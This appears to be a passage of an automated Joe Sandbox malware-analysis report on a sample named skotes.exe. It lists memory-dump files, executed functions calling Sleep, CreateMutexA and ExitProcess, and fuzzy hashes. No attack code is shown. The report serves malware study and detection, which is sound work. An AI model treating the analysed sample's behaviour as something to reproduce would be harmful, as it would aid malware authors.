Associated: 00000001.00000002.1800972349.0000000000D23000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800992888.0000000000D38000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801009999.0000000000D3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801027442.0000000000D46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801044455.0000000000D49000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801061079.0000000000D4A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801077619.0000000000D50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801093390.0000000000D51000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801109401.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801129641.0000000000D68000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801146718.0000000000D69000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801163034.0000000000D6B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801179569.0000000000D71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801196950.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801214060.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801214060.0000000000DB8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801265616.0000000000DCE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801284225.0000000000DCF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801304743.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801325986.0000000000DE8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801344149.0000000000DE9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801370653.0000000000DED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801390333.0000000000DEF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801410772.0000000000DFD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1801430143.0000000000DFE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ae0000_skotes.jbxd

Yara matches

Similarity

API ID: Mtx_unlock
String ID:
API String ID: 1418687624-0
Opcode ID: a05f52cd1464f2725b411b42d1cbbb792825536efb2119ab9a29c0e5095b6ac0
Instruction ID: 903644b07cd85c833c72f9627c1389e957c0c0bc9f195f5d369d86838764f0d9
Opcode Fuzzy Hash: a05f52cd1464f2725b411b42d1cbbb792825536efb2119ab9a29c0e5095b6ac0
Instruction Fuzzy Hash: BEA1D271A05249DFDF10DFA6CA487AAB7F8FF15320F048269E915D7241EB31EA04CB91

Analysis Process: skotes.exePID: 2640, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	0.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	634
Total number of Limit Nodes:	4

Executed Functions

Function 00B1652B Relevance: 1.5, APIs: 1, Instructions: 24
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,?,00B1652A,?,?,?,?,?,00B17661), ref: 00B16567

Memory Dump Source

Source File: 00000002.00000002.1804750908.0000000000AE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000002.00000002.1804730516.0000000000AE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804750908.0000000000B42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804818038.0000000000B49000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804836483.0000000000B4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804856699.0000000000B57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804961703.0000000000CB6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804980301.0000000000CB8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805002014.0000000000CCF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805025149.0000000000CD1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805044429.0000000000CD2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805044429.0000000000CDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805087045.0000000000CDF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805109547.0000000000CE0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805128420.0000000000CE2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805148359.0000000000CE3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805167283.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805186865.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805204810.0000000000CE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805224345.0000000000CE7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805246673.0000000000CEF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805265791.0000000000CF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805288485.0000000000D09000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805306702.0000000000D0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805323464.0000000000D0C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805341734.0000000000D0D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805361969.0000000000D0E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805379759.0000000000D14000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805400127.0000000000D15000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805421128.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805440417.0000000000D1E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805459158.0000000000D23000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805481482.0000000000D38000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805501727.0000000000D3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805522435.0000000000D46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805541280.0000000000D49000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805563809.0000000000D4A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805581784.0000000000D50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805602619.0000000000D51000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805620329.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805642101.0000000000D68000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805661314.0000000000D69000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805679555.0000000000D6B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805700959.0000000000D71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805719543.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805741398.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805741398.0000000000DB8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805797397.0000000000DCE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805817094.0000000000DCF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805837959.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805862352.0000000000DE8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805882030.0000000000DE9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805906340.0000000000DED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805924417.0000000000DEF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805945795.0000000000DFD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805965093.0000000000DFE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ae0000_skotes.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: d6a6371e5b256211e14241017cff341f106a32138857a8f4298e96a5faf57c19
Instruction ID: e1be2f5f67ded3d4642246d9077a12e2f067ff9cd6ddb2d7d4f152ceeb7796bf
Opcode Fuzzy Hash: d6a6371e5b256211e14241017cff341f106a32138857a8f4298e96a5faf57c19
Instruction Fuzzy Hash: 4EE08C3104120CAECF25BB18CC09E8D3BAAEF62759F900840FC1956222CB35EEC2C690

Function 00AE9BA5 Relevance: 3.1, APIs: 2, Instructions: 140
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00AEA963
CreateMutexA.KERNELBASE(00000000,00000000,00B43254), ref: 00AEA981

Memory Dump Source

Source File: 00000002.00000002.1804750908.0000000000AE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000002.00000002.1804730516.0000000000AE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804750908.0000000000B42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804818038.0000000000B49000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804836483.0000000000B4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804856699.0000000000B57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804961703.0000000000CB6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804980301.0000000000CB8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805002014.0000000000CCF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805025149.0000000000CD1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805044429.0000000000CD2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805044429.0000000000CDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805087045.0000000000CDF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805109547.0000000000CE0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805128420.0000000000CE2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805148359.0000000000CE3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805167283.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805186865.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805204810.0000000000CE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805224345.0000000000CE7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805246673.0000000000CEF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805265791.0000000000CF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805288485.0000000000D09000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805306702.0000000000D0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805323464.0000000000D0C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805341734.0000000000D0D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805361969.0000000000D0E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805379759.0000000000D14000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805400127.0000000000D15000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805421128.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805440417.0000000000D1E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805459158.0000000000D23000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805481482.0000000000D38000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805501727.0000000000D3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805522435.0000000000D46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805541280.0000000000D49000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805563809.0000000000D4A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805581784.0000000000D50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805602619.0000000000D51000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805620329.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805642101.0000000000D68000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805661314.0000000000D69000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805679555.0000000000D6B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805700959.0000000000D71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805719543.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805741398.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805741398.0000000000DB8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805797397.0000000000DCE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805817094.0000000000DCF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805837959.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805862352.0000000000DE8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805882030.0000000000DE9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805906340.0000000000DED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805924417.0000000000DEF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805945795.0000000000DFD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805965093.0000000000DFE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ae0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 57d1a6f921a9f34552618b6012dd46bb4e2e7541bf59ede2a8d32e224e664b6b
Instruction ID: 15842cac0d13da9fc4bb9243c533aa24cc8a0ca76870c352acdf6f6236117d39
Opcode Fuzzy Hash: 57d1a6f921a9f34552618b6012dd46bb4e2e7541bf59ede2a8d32e224e664b6b
Instruction Fuzzy Hash: D1317B317003848FEB18EB79DD8576EBBA2EBD1314F344219E014D73D6CB7559818751

Function 00AE9F44 Relevance: 3.1, APIs: 2, Instructions: 137
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00AEA963
CreateMutexA.KERNELBASE(00000000,00000000,00B43254), ref: 00AEA981

Memory Dump Source

Source File: 00000002.00000002.1804750908.0000000000AE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000002.00000002.1804730516.0000000000AE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804750908.0000000000B42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804818038.0000000000B49000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804836483.0000000000B4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804856699.0000000000B57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804961703.0000000000CB6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804980301.0000000000CB8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805002014.0000000000CCF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805025149.0000000000CD1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805044429.0000000000CD2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805044429.0000000000CDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805087045.0000000000CDF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805109547.0000000000CE0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805128420.0000000000CE2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805148359.0000000000CE3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805167283.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805186865.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805204810.0000000000CE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805224345.0000000000CE7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805246673.0000000000CEF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805265791.0000000000CF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805288485.0000000000D09000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805306702.0000000000D0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805323464.0000000000D0C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805341734.0000000000D0D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805361969.0000000000D0E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805379759.0000000000D14000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805400127.0000000000D15000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805421128.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805440417.0000000000D1E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805459158.0000000000D23000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805481482.0000000000D38000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805501727.0000000000D3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805522435.0000000000D46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805541280.0000000000D49000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805563809.0000000000D4A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805581784.0000000000D50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805602619.0000000000D51000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805620329.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805642101.0000000000D68000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805661314.0000000000D69000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805679555.0000000000D6B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805700959.0000000000D71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805719543.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805741398.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805741398.0000000000DB8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805797397.0000000000DCE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805817094.0000000000DCF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805837959.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805862352.0000000000DE8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805882030.0000000000DE9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805906340.0000000000DED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805924417.0000000000DEF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805945795.0000000000DFD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805965093.0000000000DFE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ae0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 3e15ee0b4234e7d1a4715128afaf0ca3a4f9500189090197a9eb4e1fff9ccbcc
Instruction ID: 15e37762e6dab340aec41ef05b1efa2aead01263fa3b9ef95eb84561f37f5b79
Opcode Fuzzy Hash: 3e15ee0b4234e7d1a4715128afaf0ca3a4f9500189090197a9eb4e1fff9ccbcc
Instruction Fuzzy Hash: B8316B317002848BEB18EB7EDD847ADB7A2EBD5310F244619F015DB3D6CB75A9808752

Function 00AEA079 Relevance: 3.1, APIs: 2, Instructions: 136
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00AEA963
CreateMutexA.KERNELBASE(00000000,00000000,00B43254), ref: 00AEA981

Memory Dump Source

Source File: 00000002.00000002.1804750908.0000000000AE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000002.00000002.1804730516.0000000000AE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804750908.0000000000B42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804818038.0000000000B49000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804836483.0000000000B4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804856699.0000000000B57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804961703.0000000000CB6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804980301.0000000000CB8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805002014.0000000000CCF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805025149.0000000000CD1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805044429.0000000000CD2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805044429.0000000000CDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805087045.0000000000CDF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805109547.0000000000CE0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805128420.0000000000CE2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805148359.0000000000CE3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805167283.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805186865.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805204810.0000000000CE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805224345.0000000000CE7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805246673.0000000000CEF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805265791.0000000000CF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805288485.0000000000D09000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805306702.0000000000D0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805323464.0000000000D0C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805341734.0000000000D0D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805361969.0000000000D0E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805379759.0000000000D14000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805400127.0000000000D15000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805421128.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805440417.0000000000D1E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805459158.0000000000D23000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805481482.0000000000D38000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805501727.0000000000D3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805522435.0000000000D46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805541280.0000000000D49000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805563809.0000000000D4A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805581784.0000000000D50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805602619.0000000000D51000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805620329.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805642101.0000000000D68000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805661314.0000000000D69000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805679555.0000000000D6B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805700959.0000000000D71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805719543.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805741398.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805741398.0000000000DB8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805797397.0000000000DCE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805817094.0000000000DCF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805837959.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805862352.0000000000DE8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805882030.0000000000DE9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805906340.0000000000DED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805924417.0000000000DEF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805945795.0000000000DFD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805965093.0000000000DFE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ae0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
